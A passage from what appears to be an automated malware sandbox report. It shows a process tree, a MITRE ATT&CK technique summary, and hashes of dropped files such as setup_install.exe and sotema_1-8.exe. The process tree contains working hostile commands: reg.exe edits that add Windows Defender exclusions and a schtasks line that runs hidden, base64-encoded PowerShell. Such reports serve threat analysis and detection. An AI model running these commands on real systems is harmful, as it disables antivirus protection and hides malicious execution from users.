                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:2832
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:2448
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:1420
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:3316
                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                  schtasks /CREATE /TN "giczgFUdC" /SC once /ST 02:05:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                  PID:1180
                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                  schtasks /run /I /tn "giczgFUdC"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:1084
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:672

                                                                                                                                                                                                  Network

                                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                  Execution

                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1053

                                                                                                                                                                                                  Persistence

                                                                                                                                                                                                  Modify Existing Service

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1031

                                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1060

                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1053

                                                                                                                                                                                                  Privilege Escalation

                                                                                                                                                                                                  Bypass User Account Control

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1088

                                                                                                                                                                                                  Scheduled Task

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1053

                                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                                  7
                                                                                                                                                                                                  T1112

                                                                                                                                                                                                  Disabling Security Tools

                                                                                                                                                                                                  4
                                                                                                                                                                                                  T1089

                                                                                                                                                                                                  Bypass User Account Control

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1088

                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1497

                                                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1130

                                                                                                                                                                                                  Credential Access

                                                                                                                                                                                                  Credentials in Files

                                                                                                                                                                                                  4
                                                                                                                                                                                                  T1081

                                                                                                                                                                                                  Discovery

                                                                                                                                                                                                  Query Registry

                                                                                                                                                                                                  7
                                                                                                                                                                                                  T1012

                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1497

                                                                                                                                                                                                  System Information Discovery

                                                                                                                                                                                                  7
                                                                                                                                                                                                  T1082

                                                                                                                                                                                                  Peripheral Device Discovery

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1120

                                                                                                                                                                                                  Process Discovery

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1057

                                                                                                                                                                                                  Collection

                                                                                                                                                                                                  Data from Local System

                                                                                                                                                                                                  4
                                                                                                                                                                                                  T1005

                                                                                                                                                                                                  Command and Control

                                                                                                                                                                                                  Web Service

                                                                                                                                                                                                  1
                                                                                                                                                                                                  T1102

                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\libcurl.dll
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\libcurl.dll
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\libcurlpp.dll
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\libcurlpp.dll
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\libgcc_s_dw2-1.dll
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\libgcc_s_dw2-1.dll
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\libgcc_s_dw2-1.dll
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\libstdc++-6.dll
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\libstdc++-6.dll
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\libwinpthread-1.dll
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\libwinpthread-1.dll
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\setup_install.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    010ed9e894981129d928561d36b2f65f

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    f5548e59941bce5ce2b8b86067fb0fe27f826570

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    195325feef9e246a50ac98c54205b460b0323a1934bf047dc994e0976e46bc9f

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    5710b1287efa9f6e544fb1dfc519fcf101379b73880b5b10784853633e8c0a7707b4cb2ce904369d90fc77e565cc63d21c2fe31860a8257f6bc874271967a2c9

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\setup_install.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    010ed9e894981129d928561d36b2f65f

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    f5548e59941bce5ce2b8b86067fb0fe27f826570

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    195325feef9e246a50ac98c54205b460b0323a1934bf047dc994e0976e46bc9f

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    5710b1287efa9f6e544fb1dfc519fcf101379b73880b5b10784853633e8c0a7707b4cb2ce904369d90fc77e565cc63d21c2fe31860a8257f6bc874271967a2c9

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_1.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    7837314688b7989de1e8d94f598eb2dd

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    889ae8ce433d5357f8ea2aff64daaba563dc94e3

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    d8c28d07c365873b4e8332f057f062e65f2dd0cd4d599fd8b16d82eca5cf4247

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    3df0c24a9f51a82716abb8e87ff44fdb6686183423d1f2f7d6bfb4cd03c3a18490f2c7987c29f3e1b2d25c48d428c2e73033998a872b185f70bb68a7aedb3e7c

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_1.txt
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    7837314688b7989de1e8d94f598eb2dd

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    889ae8ce433d5357f8ea2aff64daaba563dc94e3

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    d8c28d07c365873b4e8332f057f062e65f2dd0cd4d599fd8b16d82eca5cf4247

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    3df0c24a9f51a82716abb8e87ff44fdb6686183423d1f2f7d6bfb4cd03c3a18490f2c7987c29f3e1b2d25c48d428c2e73033998a872b185f70bb68a7aedb3e7c

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_2.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    ce748a3cc2d227035478c7bfbbce6d1c

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    1439aea074e496e3be89d1182c98802b4cd6d5db

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    fc89e01cff6cbe417bbfdf12984a25b14c317090471bf89a4f47eec1f82fe630

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    e31aa4b43e38c3f2c36b2041dc784adaf0ab2620699ef0d855132a8dcb577c8090af10b467283f0204b41fd93c6ae0397a67d1bc9e2ad6fa7d90c5d75aacc5a8

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_2.txt
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    ce748a3cc2d227035478c7bfbbce6d1c

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    1439aea074e496e3be89d1182c98802b4cd6d5db

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    fc89e01cff6cbe417bbfdf12984a25b14c317090471bf89a4f47eec1f82fe630

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    e31aa4b43e38c3f2c36b2041dc784adaf0ab2620699ef0d855132a8dcb577c8090af10b467283f0204b41fd93c6ae0397a67d1bc9e2ad6fa7d90c5d75aacc5a8

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_3.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    18fd29a7113a43375058a2788177b0ee

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    86d2df734704de865027f6cbfbc8e5a329990fb5

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    088df39953be8f10f9f92ecc00b2ecb3f21bf987ddbab78b684b7760ac1b9559

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    c6d376890e79040b47b86b673b970cbc9606d6f5f8a11fb2ec2e3d370d44ec8d9347852d6273fa051c0f26d73cadc9312818a23a9c998cc5aa3b98dd01877688

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_3.txt
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    18fd29a7113a43375058a2788177b0ee

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    86d2df734704de865027f6cbfbc8e5a329990fb5

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    088df39953be8f10f9f92ecc00b2ecb3f21bf987ddbab78b684b7760ac1b9559

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    c6d376890e79040b47b86b673b970cbc9606d6f5f8a11fb2ec2e3d370d44ec8d9347852d6273fa051c0f26d73cadc9312818a23a9c998cc5aa3b98dd01877688

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_4.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_4.txt
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_5.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    bcb71fb45d694263db5beb8187869059

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    582eda9bb90f9a64a41704b80f5ef2aded5142a3

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    0bcf14216198351151d34d3e6ea6c05bf06c62eee05e15804ba132ea455b3710

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    c3830dadd928a5986002c9c7d495915a1756700609676c9a11fc364ad08e06ce6ac93f3116b8e8a7cd9327d875d21e1f4d78446e2e85030f76aad7f21c494676

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_5.txt
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    bcb71fb45d694263db5beb8187869059

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    582eda9bb90f9a64a41704b80f5ef2aded5142a3

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    0bcf14216198351151d34d3e6ea6c05bf06c62eee05e15804ba132ea455b3710

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    c3830dadd928a5986002c9c7d495915a1756700609676c9a11fc364ad08e06ce6ac93f3116b8e8a7cd9327d875d21e1f4d78446e2e85030f76aad7f21c494676

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_6.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    8c2f0a89bd8bfb029cf02e853ea30d82

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    d5d75a26a70a769d04ce977fe8bc774efa9de3be

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    6cb493755e621fed7e262241c1dc4a7baf77c08dc5eb18cae912eec57958eb47

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    10e2b0cb031119badf8bb1844a64e70e6cfd2034a7887d71a82df045818e41abc45f50c5733fcea0a53bbedd63d0113f4fad95c36f61c43ea71350fc04159623

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_6.txt
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    8c2f0a89bd8bfb029cf02e853ea30d82

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    d5d75a26a70a769d04ce977fe8bc774efa9de3be

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    6cb493755e621fed7e262241c1dc4a7baf77c08dc5eb18cae912eec57958eb47

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    10e2b0cb031119badf8bb1844a64e70e6cfd2034a7887d71a82df045818e41abc45f50c5733fcea0a53bbedd63d0113f4fad95c36f61c43ea71350fc04159623

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_7.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    cfb846afa58b9a2fb8018e55ef841f90

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    8a6bfe762bf3093b1fff0211752a34dc5ee57319

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    92f609f0932717ebf8ad7b9b3f049348d10f74442864e146dec3150cc684baf6

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    73344d00671fc365c6ac091524a975e67f5243590badff7c5253ee2c44a1944d60e801a0282218014941139bb59044c23372f802beca57559bbe76d61a002df1

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_7.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    cfb846afa58b9a2fb8018e55ef841f90

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    8a6bfe762bf3093b1fff0211752a34dc5ee57319

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    92f609f0932717ebf8ad7b9b3f049348d10f74442864e146dec3150cc684baf6

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    73344d00671fc365c6ac091524a975e67f5243590badff7c5253ee2c44a1944d60e801a0282218014941139bb59044c23372f802beca57559bbe76d61a002df1

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_7.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    cfb846afa58b9a2fb8018e55ef841f90

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    8a6bfe762bf3093b1fff0211752a34dc5ee57319

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    92f609f0932717ebf8ad7b9b3f049348d10f74442864e146dec3150cc684baf6

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    73344d00671fc365c6ac091524a975e67f5243590badff7c5253ee2c44a1944d60e801a0282218014941139bb59044c23372f802beca57559bbe76d61a002df1

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_7.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    cfb846afa58b9a2fb8018e55ef841f90

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    8a6bfe762bf3093b1fff0211752a34dc5ee57319

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    92f609f0932717ebf8ad7b9b3f049348d10f74442864e146dec3150cc684baf6

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    73344d00671fc365c6ac091524a975e67f5243590badff7c5253ee2c44a1944d60e801a0282218014941139bb59044c23372f802beca57559bbe76d61a002df1

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_7.txt
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    cfb846afa58b9a2fb8018e55ef841f90

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    8a6bfe762bf3093b1fff0211752a34dc5ee57319

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    92f609f0932717ebf8ad7b9b3f049348d10f74442864e146dec3150cc684baf6

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    73344d00671fc365c6ac091524a975e67f5243590badff7c5253ee2c44a1944d60e801a0282218014941139bb59044c23372f802beca57559bbe76d61a002df1

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_8.exe
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    1299cbed543bacc3c4923a4cb589d4fc

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    546c943125b7d1ebf6f80f6eee3e9d03f64073e4

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    e0ebdc9b770cc324034b53551b696fd8d7a0e2c49ae22271c747940ecbcc2730

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    da1ae97fbc1336fb1a65e722221343f07b8d57932b200af4f1578d8250604044f855cc580fd249fa604e302cae73967d6e87c28ea93da420c4f53feca2146770

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_8.txt
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    1299cbed543bacc3c4923a4cb589d4fc

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    546c943125b7d1ebf6f80f6eee3e9d03f64073e4

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    e0ebdc9b770cc324034b53551b696fd8d7a0e2c49ae22271c747940ecbcc2730

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    da1ae97fbc1336fb1a65e722221343f07b8d57932b200af4f1578d8250604044f855cc580fd249fa604e302cae73967d6e87c28ea93da420c4f53feca2146770

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    13abe7637d904829fbb37ecda44a1670

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    de26b60d2c0b1660220caf3f4a11dfabaa0e7b9f

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    7a20b34c0f9b516007d40a570eafb782028c5613138e8b9697ca398b0b3420d6

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    6e02ca1282f3d1bbbb684046eb5dcef412366a0ed2276c1f22d2f16b978647c0e35a8d728a0349f022295b0aba30139b2b8bb75b92aa5fdcc18aae9dcf357d77

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    89c739ae3bbee8c40a52090ad0641d31

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    d0f7dc9a0a3e52af0f9f9736f26e401636c420a1

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    10a122bd647c88aa23f96687e26b251862e83be9dbb89532f4a578689547972d

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    cc5059e478e5f469fde39e4119ee75eed7066f2a2069590cb5046e478b812f87ab1fc21dcfe44c965061fa4f9f83d6a14accf0c0e9b2406ae51504d06a3f6480

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    89c739ae3bbee8c40a52090ad0641d31

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    d0f7dc9a0a3e52af0f9f9736f26e401636c420a1

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    10a122bd647c88aa23f96687e26b251862e83be9dbb89532f4a578689547972d

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    cc5059e478e5f469fde39e4119ee75eed7066f2a2069590cb5046e478b812f87ab1fc21dcfe44c965061fa4f9f83d6a14accf0c0e9b2406ae51504d06a3f6480

                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                    MD5

